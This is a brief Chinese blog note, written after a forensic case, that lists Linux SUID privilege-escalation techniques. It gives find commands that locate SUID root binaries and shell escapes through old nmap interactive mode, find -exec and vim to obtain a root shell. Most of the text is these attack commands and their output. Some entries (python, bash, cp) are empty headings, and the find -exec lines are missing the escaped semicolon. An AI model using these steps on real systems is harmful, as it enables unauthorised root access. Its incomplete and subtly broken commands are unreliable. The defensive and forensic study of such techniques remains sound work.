suid提权

https://www.cnblogs.com/hellobao/articles/17261531.html
上回绿盟取证时发现入侵者有部分木马是root权限运行，取证时用的apache账号，权限不够。在多处发现攻击者可能通过python进行suid提取。所以总结下攻击者可能用到的suid提权。

1.查找root权限的二进制文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

#SUID权限的设置只针对二进制可执行文件，可以通过chmod u+s、chmod u-s命令赋予、去掉二进制文件u权限。
#SUID是Linux的特殊权限，u代替x执行权限，在执行时进程不是发起者，而是程序的所属者。

python

bash

cp（mv、wegt同理）

2.nmap
老版的nmap(2.02-5.21)有相互的功能--interactive
nmap> !sh
sh-3.2# whoami
root

3.find
touch test
find test -exec whoami ;

4.vim
如果vim以SUID运行，就会继承root用户的权限，可以读取系统中所有的文件
vim/vi
:shell